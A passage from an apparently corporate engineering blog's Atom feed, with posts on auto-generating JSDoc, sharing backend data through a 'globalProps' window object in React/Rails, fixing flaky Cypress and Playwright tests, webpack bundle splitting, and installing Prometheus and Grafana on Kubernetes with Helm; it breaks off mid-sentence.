getFileContent(    path.join(EXPORTED_TYPES_FOLDER_NAME, typeFileName)  );  const typeFileAST = parseTypeFile(typeFileContent);  typeFileTraverser({    typeFileName: `${EXPORTED_TYPES_FOLDER_NAME}/${typeFileName}`,    typeFileAST,    entityTitleToDescMapOfAllFiles,    babelTraverse: traverse,    babelCodeGenerator: generate,    babelTypes,  });});</code></pre><p>The script concludes by logging a success message, indicating the completion ofthe JSDoc generation process.</p><p>Once everything was set up and released, we were able to access both types anddocumentation from the code editor itself.</p><p><img src="/blog_images/2024/jsdoc-generation/vs-code-docs.png" alt="VS Code showing the types and docs"></p><h2>Conclusion</h2><p>By leveraging the power of type definitions and JSDoc comments, we were able toprovide easy access to documentation and significantly enhance the developerexperience and streamline the development process. The automated generation ofJSDoc comments from Markdown documentation further optimized our workflow,ensuring clarity, consistency and eliminating redundancy.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using globalProps to make it easier to share data in React.js applications]]></title>
       <author><name>Deepak Jose</name></author>
      <link href="https://www.bigbinary.com/blog/global-props"/>
      <updated>2024-02-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/global-props</id>
      <content type="html"><![CDATA[<h3>Our technology stack for Neeto</h3><p>We are building <a href="https://neeto.com">neeto</a>, and our technology stack is quitesimple. On the front end, we use React.js. On the backend we use Ruby on Rails,PostgreSQL, Redis and Sidekiq.</p><p>The term <code>globalProps</code> might not ring a bell for most people. It was coined bythe BigBinary team for our internal use. <code>globalProps</code> is data that is directlyretrieved from our backend and assigned to the browser global object that's<code>window</code>. To view the global props, we can type <code>globalProps</code> in the browserconsole, which prints out useful information set by the backend service.</p><p>&lt;img alt=&quot;desktop view&quot; src=&quot;/blog_images/2024/global-props/global-props-console.png&quot;&gt;</p><h3>How is <code>globalProps</code> implemented</h3><p>To understand where the <code>globalProps</code> came from and how it works, we need toexamine the <a href="https://github.com/reactjs/react-rails">React-Rails</a> gem. It usesRuby on Rails asset pipeline to automatically transform JSX into Ruby on Railscompatible assets using the Ruby Babel transpiler.</p><p><code>react_component</code> helper method takes a component name as the first argument,<code>props</code> as the second argument and a list of <code>HTML attributes</code> as the thirdargument. The documentation has more<a href="https://github.com/reactjs/react-rails/blob/master/docs/view-helper.md">details</a>.</p><pre><code class="language-erb">&lt;%= react_component(&quot;App&quot;, get_client_props, { class: &quot;root-container&quot; }) %&gt;</code></pre><h3>Limitations of the default behavior</h3><p>In the <code>react-rails</code> gem, the hash is set as the props of the componentspecified in the <code>react_component</code> method by default. In the example above, thehash returned by the <code>get_client_props</code> method is passed as props to the <code>App</code>component in the front end.</p><p>The limitation of this approach is that we need to pass down globalProps throughall the components by prop-drilling or React Context.</p><h5>The concept of nanos</h5><p>At neeto, anything that does not contain product-specific business logic and canbe extracted into a reusable tool is extracted into an independent package. Wecall them nanos.</p><p>You can read more about it in our blog on how<a href="https://blog.neeto.com/p/nanos-make-neeto-better">nanos make Neeto better</a>.</p><h5>Limitations in accessing the props by nanos and utility functions</h5><p>The issue with the above approaches in handling the props is that it won't bedirectly available in utility functions or nano. We explicitly need to pass itas arguments to utility functions after prop drilling. If we use React Context,it can only be accessed in React components or hooks, it cannot be accessed inutility functions. Also, we cannot directly obtain the reference of the Contextwithin the nanos.</p><h5>Why we didn't chose environment variables</h5><p>Some of the variables inside the <code>globalProps</code> are environment variables, whichis usually accessed as <code>process.env.VARIABLE_NAME</code>. If we set environmentvariables, they will be hardcoded into the JavaScript bundle at the time ofbundling. This implies that whenever we need to change the environment variable,we must trigger a redeployment.</p><h3>The solution is <code>globalProps</code></h3><p>The advantage of <code>globalProps</code> over these approaches is, it's accessibleeverywhere since it's in the browser global object window. All the nanos andutility functions that we integrate into the application have seamless access tothe props without any extra step of wiring.</p><h3>Seeding the hash at the backend into the browser's global object, window</h3><p>Seeding the hash at the backend into the browser's global object, window, isaccomplished using the above-mentioned helper method, <code>react_component</code>. As wediscussed earlier, an HTML node is created that contains <code>data-react-class</code>representing the component name and<code>data-react-props</code> attribute representing thehash we passed from the backend as an HTML-encoded string.</p><p>&lt;img alt=&quot;desktop view&quot; src=&quot;/blog_images/2024/global-props/element-console.png&quot; &gt;</p><h3>Decode the HTML-encoded string into JavaScript object</h3><p>The next step is to decode the HTML-encoded string and parse it into aJavaScript object. The hash is read from the <code>root-container</code> HTML node andparsed into a JavaScript object.</p><pre><code class="language-js">const rootContainer = document.getElementsByClassName(&quot;root-container&quot;)[0];const reactProps = JSON.parse(rootContainer?.dataset?.reactProps || &quot;{}&quot;);</code></pre><h3>Convert the case of the keys in the object</h3><p>The JavaScript object that we have obtained have the keys in snake case. We willconvert them into camel case using the helper method<a href="https://github.com/bigbinary/neeto-cist/blob/b4375525ac5ffbb0aeb6548cc64d3970379493ee/docs/pure/objects.md#keystocamelcase">keysToCamelCase</a>.</p><p>We convert the case because React prefers camel case keys, while Rails preferssnake case keys.</p><pre><code class="language-js">const globalProps = keysToCamelCase(reactProps);</code></pre><h3>Deepfreeze the global props</h3><p>Additionally, we take an extra step to deep-freeze the global props object,ensuring immutability. The helper function used here is<a href="https://github.com/bigbinary/neeto-cist/blob/b4375525ac5ffbb0aeb6548cc64d3970379493ee/docs/pure/objects.md#deepfreezeobject">deepFreezeObject</a>.This prevents modifications to global props from within the product and thusensures data integrity when working with different nanos. All these steps areperformed before the initial rendering of the React component.</p><pre><code class="language-js">window.globalProps = globalProps;deepFreezeObject(window.globalProps);</code></pre><p>Let's see the final codeblock that seeds the hash at the backend to thebrowser's global object.</p><pre><code class="language-js">export default function initializeGlobalProps() {  const rootContainer = document.getElementsByClassName(&quot;root-container&quot;);  const htmlEncodedReactProps = rootContainer[0]?.dataset?.reactProps;  const reactProps = JSON.parse(htmlEncodedReactProps || &quot;{}&quot;);  const globalProps = keysToCamelCase(reactProps);  window.globalProps = globalProps;  deepFreezeObject(window.globalProps);}</code></pre><p>If we take a closer look at the content of <code>globalProps</code>, we can see that itcarries a lot of data. As discussed earlier this data is useful to other nanos.Some of the data being passed are appName, honeyBadgerApiKey, organization, userinfo, etc.</p><p>&lt;img alt=&quot;desktop view&quot; src=&quot;/blog_images/2024/global-props/global-props-console.png&quot;&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Tackling Flaky Tests With Cypress and Playwright through Network Synchronization]]></title>
       <author><name>Shreya Kurian</name></author>
      <link href="https://www.bigbinary.com/blog/tackling-flaky-tests-in-cypress-and-playwright"/>
      <updated>2024-01-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tackling-flaky-tests-in-cypress-and-playwright</id>
      <content type="html"><![CDATA[<p>Flaky tests are a common challenge in end-to-end testing. There are many typesof flaky tests. In this blog, we will cover the flakiness that comes when UIactions take place before the API response has arrived. We'll see how<a href="https://docs.cypress.io/">Cypress</a> and <a href="https://playwright.dev/">Playwright</a>,address these challenges.</p><h2>Taming flakiness in Cypress</h2><p>In Cypress, the <code>cy.wait()</code> command is used to pause the test execution. Let'sexplore how Cypress handles flakiness with the <code>cy.intercept()</code> and <code>cy.wait()</code>commands.</p><p>Let's consider an example of an online shopping application where a new order iscreated when we click the submit button.</p><pre><code class="language-javascript">cy.intercept(&quot;/orders/*&quot;).as(&quot;fetchOrder&quot;);cy.get(&quot;[data-cy='submit']&quot;).click();cy.wait(&quot;@fetchOrder&quot;);</code></pre><p>Let's understand what the above example is trying to achieve line by line.</p><p><code>cy.intercept(&quot;/orders/\*&quot;).as(&quot;fetchOrder&quot;)</code>: Sets up a network interception.It intercepts any network request that matches the pattern <code>/orders/</code> and givesit a unique alias <code>fetchOrder</code>. This allows us to capture and control thenetwork request for further testing.</p><p><code>cy.get(&quot;[data-cy='submit']&quot;).click()</code>: Locates an HTML element with theattribute <code>data-cy</code> set to <code>submit</code> and simulates a click on it.</p><p><code>cy.wait(&quot;@fetchOrder&quot;)</code>: Instructs Cypress to wait until the interceptednetwork request with the alias <code>fetchOrder</code> is completed before proceeding withthe test.</p><p>The <code>cy.wait()</code> command involves two distinct phases of waiting.</p><p><strong>Phase 1:</strong> The command waits for a matching request to be sent from thebrowser. In the provided example, the wait command pauses execution until arequest with the URL pattern <code>/orders/</code> is initiated by the browser. Thiswaiting period continues until a matching request is found. If the command failsto identify such a request within the configured request timeout, a timeouterror message is triggered. Upon successfully detecting the matching request,the second phase kicks in.</p><p><strong>Phase 2:</strong> In this phase, the command waits until the server responds. If theanticipated response fails to arrive within the configured response timeout, atimeout error is thrown. In the above example, the wait command in this phasewill wait for the response of the request aliased as <code>fetchOrders</code>.</p><p>The dual-layered waiting mechanism, as explained above, significantly contributesto the reliability of tests. It ensures a synchronized interaction between UIactions and server responses, facilitating more robust and dependable testscenarios.</p><h3>Managing multiple responses</h3><p>Consider a situation where a user adds a product to the cart thus initiating twoconcurrent requests. The first request adds the product to the cart, while thesecond request fetches the updated list of orders. To ensure the synchronizationof these asynchronous actions, we must wait for both requests to be successfullycompleted before continuing with the test execution.</p><p>Cypress provides the <code>times</code> property in the <code>cy.intercept()</code> options, offeringcontrol over how many times a request with a particular pattern should beintercepted.</p><pre><code class="language-javascript">cy.intercept({ url: &quot;/orders/*&quot;, times: 2 }).as(&quot;fetchOrders&quot;);cy.get(&quot;[data-cy='submit']&quot;).click();cy.wait([&quot;@fetchOrders&quot;, &quot;@fetchOrders&quot;]);</code></pre><p>Let's decode the above example line by line.</p><p><code>cy.intercept({ url: &quot;/orders/\*&quot;, times: 2 }).as(&quot;fetchOrders&quot;)</code>: Specifiesthat the interception should match requests with a pattern <code>/orders/</code> and limitthe interception to exactly two occurrences.</p><p><code>cy.get(&quot;[data-cy='submit']&quot;).click()</code>: Locates an HTML element with theattribute <code>data-cy</code> set to <code>submit</code> and simulates a click on it.</p><p><code>cy.wait([&quot;@fetchOrders&quot;, &quot;@fetchOrders&quot;])</code>: Ensures that the test waits untilthe two intercepted requests with the alias <code>fetchOrders</code> are completed beforemoving on to the next steps.</p><h2>Taming Flakiness in Playwright</h2><p>Playwright offers page methods like <code>waitForRequest</code> and <code>waitForResponse</code> toaddress synchronization challenges between UI actions and API responses. Boththese methods return a promise which is resolved when an API with a matchingpattern is found and throws an error if it exceeds the configured timeout.</p><p>Let's consider the same example of an online shopping application where a neworder is created when we click the submit button.</p><pre><code class="language-javascript">await page.getByRole(&quot;button&quot;, { name: &quot;Submit&quot; }).click();await page.waitForResponse(response =&gt; response.url().includes(&quot;/orders/&quot;));</code></pre><p>In the above example, <code>page.waitForResponse</code> waits for a network response thatmatches with the URL pattern <code>/orders/</code> after clicking the submit button.</p><p>Even though the above example seems simple, there is a chance for flakinesshere. That is because the API might respond before Playwright starts waiting forit. It might happen for two reasons:</p><ol><li>API is very fast.</li><li>External factors delay the test script.</li></ol><p>Such situations could lead to timeouts and test failures.</p><p>To address the above issue, it's important to coordinate the promises so thatthe <code>waitForResponse</code> command runs at the same time as UI actions. The followingexample illustrates this approach.</p><pre><code class="language-javascript">const fetchOrder = page.waitForResponse(response =&gt;  response.url().includes(&quot;/orders/&quot;));await page.getByRole(&quot;button&quot;, { name: &quot;Submit&quot; }).click();await fetchOrder;</code></pre><p>In the above example, the page starts watching for the responses matching thespecific URL pattern, <code>/orders/</code>, before clicking the submit button. The<code>waitForResponse</code> command returns a promise, which we have saved into thevariable <code>fetchOrder</code>. After performing the click action in the following line,we wait for the promise stored in <code>fetchOrder</code> to resolve. When it resolves, itsignifies that the response has been received. This enables us to move on to thenext assertion without facing any reliability issues.</p><h3>Managing Multiple Responses</h3><p>Let's consider a scenario similar to the one explained in Cypress, where we haveto manage multiple responses, one to add a product and another to fetch theupdated list of products.</p><p>To wait for the completion of 2 requests from the same URL pattern, consider thefollowing approach.</p><pre><code class="language-javascript">const fetchOrders = Promise.all(  [...new Array(2)].map(    page.waitForResponse(response =&gt; response.url().includes(&quot;/orders/&quot;))  ));await page.getByRole(&quot;button&quot;, { name: &quot;Submit&quot; }).click();await fetchOrders;</code></pre><p>In the above example, we start waiting for two responses with the pattern<code>/orders/</code> using <code>Promise.all</code>. The flaw in the above code is that when both the<code>waitForResponse</code> methods run in parallel, and they end up tracking the exact sameAPI request. In simpler terms, it's like waiting for just one request, as bothof them wait for the completion of the same API.</p><p>To solve the above problem, it's important to improve the code by keeping trackof the resolved APIs. Let's see how to achieve the same.</p><pre><code class="language-javascript">const trackedResponses = [];const fetchOrders = Promise.all(  [...new Array(2)].map(() =&gt;    page.waitForResponse(response =&gt; {      const requestId = response.headers()?.[&quot;x-request-id&quot;];      if (        response.url().includes(&quot;/orders/&quot;) &amp;&amp;        !trackedResponses.includes(requestId)      ) {        trackedResponses.push(requestId);        return true;      }      return false;    })  ));await page.getByRole(&quot;button&quot;, { name: &quot;Submit&quot; }).click();await fetchOrders;</code></pre><p>In the above example, we have initialized a new variable <code>trackedResponses</code> withan empty array, intended to store unique identifiers (request IDs) of resolvedAPIs. It checks if the URL includes the substring <code>/orders/</code> and also whetherthe request ID has not already been tracked in <code>trackedResponses</code> array. If bothconditions are satisfied, it adds the request ID to <code>trackedResponses</code> array andreturns <code>true</code>, indicating that we should wait for the response. This approachprevents the monitoring of the same response more than once.</p><h2>Conclusion</h2><p>By understanding and implementing these synchronization techniques in Cypressand Playwright, we can significantly enhance the robustness and reliability ofend-to-end tests, ultimately contributing to a more stable and trustworthytesting suite.</p><h2>References</h2><p><a href="https://docs.cypress.io/api/commands/intercept">cy.intercept</a></p><p><a href="https://docs.cypress.io/api/commands/wait">cy.wait</a></p><p><a href="https://playwright.dev/docs/api/class-page#page-wait-for-request">page.waitForRequest</a></p><p><a href="https://playwright.dev/docs/api/class-page#page-wait-for-response">page.waitForResponse</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[Bundle Splitting]]></title>
       <author><name>Labeeb Latheef</name></author>
      <link href="https://www.bigbinary.com/blog/bundle-splitting"/>
      <updated>2024-01-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/bundle-splitting</id>
      <content type="html"><![CDATA[<h3>Loading JavaScript assets faster by bundling</h3><p>When we write code, we split parts of code into different files to managecomplexity. However, the web application requires all of its JavaScript files inorder for the application to function properly. On the surface, it might seemlike loading all the separate JavaScript files is easy, but it gets verycomplicated very fast.</p><p>Let's assume that we have three different JavaScript files in our codebase thatwe are referencing directly from the HTML.</p><pre><code class="language-html">&lt;head&gt;  &lt;script src=&quot;/assets/js/script_1.js&quot;&gt;&lt;/script&gt;  &lt;script src=&quot;/assets/js/script_2.js&quot;&gt;&lt;/script&gt;  &lt;script src=&quot;/assets/js/script_3.js&quot;&gt;&lt;/script&gt;&lt;/head&gt;</code></pre><p>Now, what if we find that <code>script_1.js</code> has a dependency on <code>script_2.js</code> and<code>script_2.js</code> needs to be loaded first? We will have to rearrange the orderingsuch that all the dependencies are satisfied. Doing this iteratively forhundreds of files can quickly become a nightmare.</p><p>One could argue why can't we write all the code in a single JavaScript file inorder to avoid this dependency issue. Modern web applications require a lot ofJavaScript code, so having all the JavaScript code in a single file is just notpractical.</p><p>Another issue with referencing hundreds of JavaScript files is that browsers canfetch only four to eight files at a time. If we have hundreds of JavaScriptfiles then the browser will take a long time to load all the JavaScript files.</p><p>Solution to all these problems is packing all those JavaScript files into onelarge file that can be downloaded in one shot. This large file will also haveall the code in the right order, which will satisfy the dependency requirement.This process of packing all the JavaScript files into one big file is called<strong>bundling</strong>. We can use tools like <a href="https://webpack.js.org/">Webpack</a> or<a href="https://rollupjs.org/">Rollup</a> to achieve bundling. These tools that help usachieve bundling are typically called <strong>bundlers</strong>.</p><p><img src="/blog_images/2024/bundle-splitting/single-bundle.png" alt="Single bundle"></p><p>It's obvious that when we use a bundler, it allows us to keep our code in anyhierarchy we want for development purposes. After all, the bundler will figureout the dependency. So is the job of the bundler to only stitch all theJavaScript files into one large JavaScript file in the right order?</p><p>No. During bundling, a bundler can be configured to apply differenttransformations and optimizations to our source code. It allows us to write ourcode using modern syntax while transforming it to a format more commonlysupported by different browser implementations during the bundling process.Another common task is the minification of our JavaScript files by removing allunwanted whitespace characters and comments.</p><p>We have discussed only a few optimizations and transformations here. Bundlerssupport many more types of optimizations and transformations.</p><p><img src="/blog_images/2024/bundle-splitting/bundler-sample.png" alt="Sample bundler output"></p><p>&lt;br /&gt;</p><h3>Loading JavaScript files faster by bundle splitting</h3><p>Bundle splitting is the process of splitting up this single bundle into multiplechunks. We just talked about the advantages of bundling. Then why are we talkingabout bundle splitting. As we will see, there are some advantages of splittingthe bundle as long as it's done strategically.</p><p>Most commonly, bundle splitting splits the code into three separate chunks. A<code>vendor</code> chunk holds every code inside the <em>node_modules</em> folder, an<code>application</code> chunk holds all the code we have written, and a <code>runtime</code> chunk isadded by the bundler that enables all other chunks to be loaded properly. If weare using webpack to bundle our application, the default bundle splittingconfiguration can be found in their<a href="https://webpack.js.org/plugins/split-chunks-plugin/#defaults">documentation</a>.If we use CRA to scaffold our application, an optimal configuration is alreadyin place.</p><p>There are different ways in which we can benefit from this process. Thanks toHTTP 2.0, the browsers are now able to fetch resources from the server inparallel. Because of this, instead of waiting for a single huge bundle to beloaded, the browser can load multiple smaller chunks in parallel for a betterload time.</p><p>&lt;br /&gt;</p><p><img src="/blog_images/2024/bundle-splitting/multiple-chunks.png" alt="Alt text"></p><p>&lt;br /&gt;</p><p>On top of that, we can ask the browser to cache a specific JavaScript file. Thiswill make the application load those JavaScript files faster the next timearound. Usually, the contents in the <code>vendor</code> chunk are not expected to changefrequently and can be reused from the browser cache, cutting down on load timesignificantly. This is usually achieved by encoding the chunk name with thecontent hash. This tells the browser: &quot;If the hash changed, assume the contentchanged, ignore the cache, and fetch the updated chunk from server&quot;.</p><pre><code class="language-javascript">// webpack.config.jsonmodule.exports = {  //...  output: {    filename: &quot;[contenthash].js&quot;,  },};</code></pre><p>Now the question is what factors determine if the bundle should be split intomultiple chunks. One such factor is the file location. As mentioned above, filesfrom the <em>node_modules</em> folder are generally kept in the <code>vendor</code> chunk whilethe application code goes into the <code>application</code> chunk. We can also specify amaximum chunk size in the bundler configuration which creates an additionalchunk whenever the current chunk exceeds the size limit.</p><pre><code class="language-javascript">// webpack.config.jsonmodule.exports = {  //...  optimization: {    splitChunks: {      maxSize: 15000000, // 15MB in static size, before compression    },  },};</code></pre><p>We can take this a step further by loading only those chunks that are necessaryto render the content that should be made visible to the user. Other chunks areloaded only when they are truly needed. This is also called lazy loading.</p><p>For example, suppose we have an application that offers two pages - a Dashboardpage, and a Settings page. A user, after logging in, directly lands on theDashboard page. Normally, the loaded JavaScript bundle will also include coderelated to the Settings page, which is not required to render the currentDashboard page. The Settings code just sits there, waiting for the user tonavigate to the Settings page.</p><p><img src="/blog_images/2024/bundle-splitting/all-parts-in-single-bundle.png" alt="All components in single bundle"></p><p>&lt;br /&gt;</p><p>This is the problem that lazy loading attempts to resolve. The easiest way toachieve this is to import the code during runtime using an inline importstatement. React offers a wrapper for integrating lazy-loaded components using<a href="https://react.dev/reference/react/Suspense">Suspense</a>.</p><pre><code class="language-jsx">import React, { Suspense } from &quot;react&quot;;const LazyComponent = React.lazy(() =&gt; import(&quot;./LazyComponent&quot;));const Component = () =&gt; (  &lt;Suspense fallback={&lt;div&gt;Loading LazyComponent&lt;/div&gt;}&gt;    &lt;LazyComponent /&gt;  &lt;/Suspense&gt;);</code></pre><p>It means, during the bundling process, whenever a lazy import is encountered bythe bundler, the code in the required module will be kept as a separate &quot;async&quot;chunk which is loaded only on demand. In the prior example, we can have theSettings component is lazily imported so that when a user goes to the Dashboardpage, the Settings-related code will not be part of this bundle, resulting in alower initial bundle size.</p><p>&lt;br /&gt;</p><p><img src="/blog_images/2024/bundle-splitting/split-parts-to-different-chunks.png" alt="Components splits into different chunks"></p><p>We can verify the results using tools like<a href="https://github.com/webpack-contrib/webpack-bundle-analyzer">Bundle Analyzer Plugin</a>that allow us to visualize and inspect the size and contents of each chunk inthe bundler output.</p><p>The lazy loading above may seem very promising, and we may be tempted to splitevery part of the application into different chunks, expecting a more efficientloading experience. However, this may not always be the case. Unlike othermethods, lazy loading requires careful evaluation of different parts of theapplication and their dependencies to determine which parts can be effectivelylazy-loaded.</p><p>Let's bring back the above example. Suppose our Settings page requires API callsto load data and render the content. If the code for the Settings page is partof the same initial bundle, as soon as we navigate to the Settings page, the APIrequests are fired, data is fetched, and content is rendered. Point to note thatthe JavaScript code for the Settings page is already loaded, so the API call wasinstantly made.</p><p>Now, what if the Settings code was split into a different on-demand chunk andnot part of the initial bundle? No, when we navigate to the Settings page, thebrowser needs to fetch the Settings chunk from the server, execute, send networkrequests, and then render the content. An additional delay is introduced herefor fetching chunks, which may add to the slowness. In a way, this brings downthe benefits offered by a single-page application (SPA).</p><p>When splitting up the bundle for our product <a href="https://neetochat.com">NeetoChat</a>,we chose to split the Settings related code into a separate, on-demand chunk.The Settings was not a random choice. It took up a large part of the bundle andone interesting feature was that the Settings page didn't require data from theserver to render. In this case Settings page contains a predefined set ofcategory tiles that allow us to navigate to other settings-related pages.</p><p><img src="/blog_images/2024/bundle-splitting/chat-settings.png" alt="NeetoChat Settings"></p><p>For the reasons mentioned above, the Settings appeared to be a good candidatefor lazy-loading, and therefore, all the related code was extracted to a fewseparate asynchronous bundles. After this change, when a user loads thedashboard page of NeetoChat, the loaded bundles do not contain code related toany of the Settings page,s thereby having a smaller overall initial asset size.</p><p>Later, when the user navigates to the Settings page, the related JavaScriptchunks are fetched, and the UI is rendered immediately without the need for APIdata. From the Settings page, the user can choose any of the Settings categoriesto navigate to the inner pages. The inner pages require API data to render thecontent. However, the required JS assets are already loaded and available toexecute as part of the last asset request on the landing page, thereby reducingthe network latency.</p><p>For more fine-grained control over lazy-loading implementation in our app, weare using the <a href="https://github.com/jamiebuilds/react-loadable">react-loadable</a>library. Video below walks you through the bundle splitting process and resultsin the NeetoChat web application.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/JW-CVXhXQmg&quot;title=&quot;Bundle splitting in NeetoChat&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Setting up Prometheus and Grafana on Kubernetes using Helm]]></title>
       <author><name>Vishal Yadav</name></author>
      <link href="https://www.bigbinary.com/blog/prometheus-and-grafana-integration"/>
      <updated>2024-01-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/prometheus-and-grafana-integration</id>
      <content type="html"><![CDATA[<p>In this blog, we will learn how to set up Prometheus and Grafana on Kubernetesusing Helm.</p><p><a href="https://prometheus.io/">Prometheus</a> along with<a href="https://grafana.com/">Grafana</a>is a highly scalable open-sourcemonitoringframework for<a href="https://devopscube.com/docker-container-clustering-tools/">container orchestration platform</a>.Prometheus probes the application and collects various data. It stores all thisdata in its time series database. Grafana is a visualization tool. It uses thedata from the database to show the data that is meaningful to the user.</p><p>Both Prometheus and Grafana are gaining popularity inthe<a href="https://devopscube.com/what-is-observability/">observability</a>space as ithelps with metrics and alerts. Learning to integrate them using Helm will allowus to monitor our Kubernetes cluster and troubleshoot problems easily.Furthermore, we can deep dive into our cluster's well-being and efficiency,focusing on resource usage and performance metrics within our Kubernetesenvironment.</p><p>We will also learn how to create a simple<a href="https://grafana.com/grafana/dashboards/">dashboard</a> on Grafana.</p><h2><strong>Why using Prometheus and Grafana for monitoring is good</strong></h2><p>Using Prometheus and Grafana for monitoring has many benefits:</p><ul><li><strong>Scalability:</strong> Both tools are highly scalable and can handle the monitoringneeds of small to large Kubernetes clusters.</li><li><strong>Flexibility:</strong> They allow us to create custom dashboards tailored to ourspecific monitoring requirements.</li><li><strong>Real-time Monitoring:</strong> Prometheus provides real-time monitoring, helping usto quickly detect and respond to issues.</li><li><strong>Alerting:</strong> Prometheus enables us to set up alerts based on specificmetrics, so we can be notified when issues arise.</li><li><strong>Data Visualization:</strong> Grafana offers powerful data visualizationcapabilities, making it easier to understand complex data.</li><li><strong>Open Source:</strong> Both Prometheus and Grafana are open-source, reducingmonitoring costs.</li><li><strong>Community Support:</strong> We can benefit from active communities, ensuringcontinuous development and support.</li><li><strong>Integration:</strong> They seamlessly integrate with other Kubernetes componentsand applications, simplifying setup.</li><li><strong>Historical Data:</strong> Grafana allows us to explore historical data, aiding inlong-term analysis and trend identification.</li><li><strong>Extensible:</strong> Both tools are extensible, allowing us to integrate additionaldata sources and plugins.</li><li><strong>Efficient Resource Usage:</strong> Prometheus efficiently utilizes resources,ensuring minimal impact on our cluster's performance.</li></ul><p>Two common ways to use Prometheus and Grafana on Kubernetes:</p><ol><li><strong>Manual Kubernetes deployment</strong>: In this method, we need to write<a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment/">Kubernetes Deployments</a>and<a href="https://kubernetes.io/docs/concepts/services-networking/service/">Services</a>for both Prometheus and Grafana. In the YAML file, we need to put all thesettings for Prometheus and Grafana on Kubernetes. Then we send these filesto our Kubernetes cluster. But we can end up with many YAML files, which canbe hard. If we make a mistake in any YAML file, Prometheus and Grafana won'twork on Kubernetes.</li><li><strong>Using Helm</strong>: This is an easy way to send any application container toKubernetes.<a href="https://helm.sh/">Helm</a>is the official package manager forKubernetes. With Helm, we can make installing, sending, and managingKubernetes makes applications easier.</li></ol><p>A<a href="https://helm.sh/">Helm Chart</a>has all the YAML files:</p><ul><li>Deployments.</li><li>Services.</li><li>Secrets.</li><li>ConfigMaps manifests.</li></ul><p>We use these files to send the application container to Kubernetes. Instead ofmaking individual YAML files for each application container, Helm lets usdownload Helm charts that already have YAML files.</p><h2>Setting up Prometheus and Grafana using Helm chart</h2><p>We will use <a href="https://artifacthub.io/">ArtifactHub</a>, which offers public andprivate repositories for Helm Charts. We will use these Helm Charts to arrangethe pods and services in our Kubernetes cluster.</p><p>To get Prometheus and Grafana working on Kubernetes with Helm, we will start byinstalling Helm.</p><h4>Installing Helm on Linux</h4><pre><code class="language-bash">sudo apt-get install helm</code></pre><h4>Installing Helm on Windows</h4><pre><code class="language-bash">choco install Kubernetes-helm</code></pre><h4>Installing Helm on macOS</h4><pre><code class="language-bash">brew install helm</code></pre><p>We can check out the official<a href="https://helm.sh/docs/intro/install/">Helm documentation</a> if we run into anyissues while installing Helm.</p><p>The image below represents the successful Helm installation on macOS.</p><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-01_at_1.09.49_PM.png" alt="Screenshot 2023-11-01 at 1.09.49PM.png"></p><p>For this blog, were going to install Helm<a href="https://artifacthub.io/packages/helm/prometheus-community/kube-prometheus-stack">chart</a>and by default, this chart also installs additional, dependent charts (includingGrafana):</p><ul><li><a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-state-metrics">prometheus-community/kube-state-metrics</a></li><li><a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/prometheus-node-exporter">prometheus-community/prometheus-node-exporter</a></li><li><a href="https://github.com/grafana/helm-charts/tree/main/charts/grafana">grafana/grafana</a></li></ul><p>To get this Helm chart, let's run this command:</p><pre><code class="language-bash">helm repo add prometheus-community https://prometheus-community.github.io/helm-chartshelm repo update</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-01_at_1.15.43_PM.png" alt="Screenshot 2023-11-01 at 1.15.43PM.png"></p><p>We have downloaded the latest version of Prometheus &amp; Grafana.</p><p>To install the Prometheus Helm Chart on a Kubernetes Cluster, let's run thefollowing command:</p><pre><code class="language-bash">helm install my-kube-prometheus-stack prometheus-community/kube-prometheus-stack</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-01_at_1.21.46_PM.png" alt="Screenshot 2023-11-01 at 1.21.46PM.png"></p><p>We have successfully installed Prometheus &amp; Grafana on the Kubernetes Cluster.We can access the Prometheus &amp; Grafana servers via ports 9090 &amp; 80,respectively.</p><p>Now, let's run the followingcommand to view all the resources created by theHelm Chart in our Kubernetes cluster:</p><pre><code class="language-bash">kubectl get all</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_11.19.39_AM.png" alt="Screenshot 2023-11-02 at 11.19.39AM.png">The Helm chart created the following resources:</p><ul><li><strong>Pods</strong>: It hosts the deployed Prometheus Kubernetes application inside thecluster.</li><li><strong>Replica Sets</strong>: A collection of instances of the same application inside theKubernetes cluster. It enhances application reliability.</li><li><strong>Deployments</strong>: It is the blueprint for creating the application pods.</li><li><strong>Services</strong>: It exposes the pods running inside the Kubernetes cluster. Weuse it to access the deployed Kubernetes application.</li><li><strong>Stateful Sets</strong>: They manage the deployment of the stateful applicationcomponents and ensure stable and predictable network identities for thesecomponents.</li><li><strong>Daemon Sets</strong>: They ensure that all (or a specific set of) nodes run a copyof a pod, which is useful for tasks such as logging, monitoring, and othernode-specific operations.</li></ul><p>Run this command to view all the Kubernetes Services for Prometheus &amp; Grafana:</p><pre><code class="language-bash">kubectl get service</code></pre><p><img src="/blog_images/2024/prometheus-and-grafana-integration/Screenshot_2023-11-02_at_11.37.39_AM.png" alt="Screenshot 2023-11-02 at 11.37.39AM.png"></p><p>Listed services for Prometheus and Grafana are:</p><ul><li>alertmanager-operated</li><li>kube-prometheus-stack-alertmanager</li><li>kube-prometheus-stack-grafana</li><li>kube-prometheus-stack-kube-state-metrics</li><li>kube-prometheus-stack-operator</li><li>kube-prometheus-stack-prometheus</li><li>kube-prometheus-stack-prometheus-node-exporter</li><li>prometheus-operated</li></ul><p><code>kube-prometheus-stack-grafana</code> and <code>kube-prometheus-stack-prometheus</code> are the<code>ClusterIP</code> type services, which means we can only access them within theKubernetes cluster.</p><p>To expose the Prometheus and Grafana to be accessed outside the Kubernetescluster , we can either use the 